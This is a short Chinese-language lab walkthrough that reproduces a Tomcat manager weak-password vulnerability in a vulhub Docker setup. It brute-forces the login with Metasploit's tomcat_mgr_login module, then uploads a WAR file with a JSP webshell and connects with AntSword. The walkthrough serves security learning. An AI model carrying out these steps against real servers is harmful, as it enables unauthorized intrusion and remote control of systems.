一、漏洞原理
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。
二、漏洞复现
客户机:192.168.0.3
攻击机:192.168.0.14
1.搭建环境
使用vulhub搭建Tomcat8的环境
docker-compose up -d
2.查看环境端口是否启动成功
docker ps
3.访问Tomcat首页
##如果访问不了Tomcat;防火墙策略存在问题;如果是关闭了的就需要开启防火墙增加8080端口的策略,如果开启了的直接增加策略
systemctl start firewalld
systemctl status firewalld
firewall-cmd --state
firewall-cmd --permanent --zone=public --list-ports
firewall-cmd --zone=public --add-port=8080/tcp --permanent
firewall-cmd --reload
firewall-cmd --permanent --zone=public --list-ports
5.访问Tomcat后台地址
http://xxx:8080/manager/html
6.用msf里面auxiliary(scanner/http/tomcat_mgr_login)弱口令爆破
msfconsole
search tomcat
7.基本配置一下参数
set rhosts 192.168.0.3
set rport 8080
run
8.登录后台上传war包的webshell
上传带jsp木马的war压缩包
这里回显ok表示成功
9.访问webshell木马
10.蚁剑连接